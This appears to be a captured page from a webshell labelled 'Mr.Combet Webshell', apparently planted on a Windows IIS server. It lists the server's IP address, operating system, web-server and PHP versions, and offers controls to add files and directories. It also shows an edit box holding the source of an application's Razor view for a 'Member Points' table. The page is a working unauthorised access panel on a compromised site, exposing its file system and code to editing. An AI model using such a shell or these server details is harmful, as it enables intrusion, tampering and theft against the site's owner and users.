Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
inetpub
/
wwwroot
/
mapqa
/
Views
/
GALSGroup
/
Edit File Name :
Index.cshtml
@model List<RER_Project.DataAccess.Functions.FnGalsQuestionsAnswersList> @using RER_Project.BusinessLayer.BusinessService @using RER_Project.Core.Helpers @{ ViewBag.Title = "GALS Group"; var meta = AppUserService.GetCurrent(); } <div class="row wrapper border-bottom white-bg page-heading"> <div class="col-md-8"> <ol class="breadcrumb"> <li class="active"> <strong>Member Points</strong> </li> </ol> </div> <div class="col-lg-4"> <div class="title-action"> @if (meta.RoleId == (int)EnumRoleHelper.Roles.Admin || meta.RoleId == (int)EnumRoleHelper.Roles.MnE || meta.RoleId == (int)EnumRoleHelper.Roles.MnEOfficer) { <a href="/gals_questions_answers/create/@ViewBag.MemberId" class="btn btn-primary">Create</a> } </div> </div> </div> <div class="wrapper wrapper-content animated fadeInRight"> <div class="row"> <div class="col-lg-12"> <div class="ibox float-e-margins"> @if (Model != null) { <div class="ibox-content"> @*<label style="font-size: medium"><b>@Model.FirstOrDefault().first_name @Model.FirstOrDefault().last_name</b></label>*@ <hr /> <div class="table-responsive" style="margin-top: 16px;"> <table class="footable table table-hover" id="userListTable"> <thead> <tr> <th class="col-md-2">Fiscal Year</th> <th class="col-md-2">Total Points</th> <th class="col-md-2"> Action </th> </tr> </thead> <tbody> @foreach (var item in Model) { <tr> <td>@item.fiscal_year</td> <td>@item.sum</td> <td> <a class="btn btn-default btn-xs" href="@("/gals_questions_answers/edit?memberId=" + item.member_id + "&fiscalYear=" + item.fiscal_year)" title="Edit"><i class="fa fa-edit"></i></a> </td> </tr> } </tbody> </table> </div> </div> } else { <h2>No Data Found</h2> } </div> </div> </div> </div>
Save